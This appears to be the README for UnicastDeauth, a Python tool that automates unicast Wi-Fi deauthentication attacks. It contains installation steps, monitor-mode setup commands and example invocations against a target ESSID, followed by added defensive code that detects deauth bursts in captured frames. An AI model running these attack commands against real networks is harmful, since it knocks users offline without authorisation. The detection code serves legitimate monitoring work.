UnicastDeauth is a simple Python 3 script that automates unicast Wi-Fi deauthentication attacks. In order to do so, it identifies all access points (APs) emitting the target ESSID and all connected stations (STAs), launching Aircrack-ng's typical deauthentication for each AP-STA tuple.
As some STAs ignore broadcast deauthentication frames, I've had to grab BSSIDs from airodump-ng to later specify them in aireplay-ng many times, so I thought of automating this process to save some time.
git clone 'https://github.com/mamatb/UnicastDeauth.git'
pip install -r './UnicastDeauth/requirements.txt'
As with all tools using Wi-Fi cards in monitor mode, first kill all processes that could interfere and then configure the Wi-Fi interface (as root):
airmon-ng check kill
ip link set dev "${WIFI_INTERFACE}" down
iw dev "${WIFI_INTERFACE}" set monitor control
iw dev "${WIFI_INTERFACE}" set channel "${WIFI_CHANNEL}"
ip link set dev "${WIFI_INTERFACE}" up
After that just follow the help section of the script:
usage: UnicastDeauth.py [-h] -i WIFI_INTERFACE -e ESSID [-b] [-n DEAUTH_ROUNDS] [-tl APS_TARGETLIST] [-wl APS_WHITELIST]

UnicastDeauth is a simple Python 3 script that automates unicast Wi-Fi deauthentication attacks

options:
  -h, --help          show this help message and exit
  -i WIFI_INTERFACE   attacker Wi-Fi interface
  -e ESSID            target ESSID
  -b                  enable broadcast deauthentication
  -n DEAUTH_ROUNDS    number of deauthentication rounds
  -tl APS_TARGETLIST  comma-separated known target APs
  -wl APS_WHITELIST   comma-separated APs whitelist

examples:
  UnicastDeauth.py -i wlan0 -e NETGEAR -b
  UnicastDeauth.py -i wlan0 -e NETGEAR -n 8
  UnicastDeauth.py -i wlan0 -e NETGEAR -tl 00:11:22:33:44:00,00:11:22:33:44:55
  UnicastDeauth.py -i wlan0 -e NETGEAR -wl 00:11:22:33:44:00,00:11:22:33:44:55
Please note that launching deauthentication attacks can be pretty noisy in certain environments. Also remember that they won't work if Protected Management Frames are in use.
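The noise mentioned above is what a monitoring sensor keys on: repeated unprotected deauthentication frames for the same AP-STA pair. The following is an added example, not part of UnicastDeauth, that parses raw 802.11 frames and flags such bursts while ignoring frames with the Protected Frame bit set; the function names, window, threshold and sample capture are assumptions made for illustration.

```python
import struct
from collections import defaultdict

def parse_deauth(frame):
    """Parse an 802.11 MAC frame (no radiotap, no FCS); None unless it is a deauth."""
    if len(frame) < 24:
        return None
    fc = struct.unpack_from("<H", frame, 0)[0]
    if (fc >> 2) & 0x3 != 0 or (fc >> 4) & 0xF != 12:  # mgmt type, deauth subtype
        return None
    addr1, addr2, addr3 = frame[4:10], frame[10:16], frame[16:22]
    protected = bool(fc & 0x4000)  # Protected Frame bit: body is encrypted (PMF)
    reason = None if protected or len(frame) < 26 else struct.unpack_from("<H", frame, 24)[0]
    # The station is whichever of receiver/transmitter is not the BSSID.
    sta = addr1 if addr2 == addr3 else addr2
    return addr3.hex(":"), sta.hex(":"), reason, protected

def flag_bursts(capture, window=1.0, threshold=5):
    """capture: time-ordered (timestamp_seconds, frame_bytes) pairs. Returns
    {(bssid, station): peak unprotected deauths in any `window` seconds}."""
    seen = defaultdict(list)
    for ts, frame in capture:
        parsed = parse_deauth(frame)
        if parsed and not parsed[3]:
            seen[parsed[:2]].append(ts)
    flagged = {}
    for pair, stamps in seen.items():
        start = peak = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[pair] = peak
    return flagged

# Constructed sample capture (not real traffic); addresses are placeholders.
def sample_frame(dst, src, bssid, fc=0x00C0, reason=7):
    raw = lambda m: bytes.fromhex(m.replace(":", ""))
    return struct.pack("<HH6s6s6sHH", fc, 0, raw(dst), raw(src), raw(bssid), 0, reason)

AP, STA1, STA2 = "00:11:22:33:44:55", "02:00:00:00:00:01", "02:00:00:00:00:02"
CAPTURE = sorted(
    [(i * 0.05, sample_frame(STA1, AP, AP)) for i in range(8)]          # AP -> STA1
    + [(0.4 + i * 0.05, sample_frame(AP, STA1, AP)) for i in range(8)]  # STA1 -> AP
    + [(3.0, sample_frame(STA2, AP, AP, reason=3)),                     # lone deauth
       (3.1, sample_frame(STA2, AP, AP, fc=0x40C0)),                    # protected
       (3.2, struct.pack("<HH", 0x0080, 0) + bytes(22))])               # beacon
```

Calling `flag_bursts(CAPTURE)` reports only the AP-STA1 pair; the lone deauth, the protected frame and the beacon do not contribute.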
- rsrdesarrollo for helping me understand the Frame Control field and some Scapy basics. He also runs a Wi-Fi hacking suite called pinecone that you should definitely check out if interested in Wi-Fi hacking.
- Scapy's usage documentation
- Aircrack-ng's deauthentication documentation
- mrn-cciew's blogpost "CWAP – MAC Header : Addresses"
- mrn-cciew's blogpost "802.11 Mgmt : Deauth & Disassociation Frames"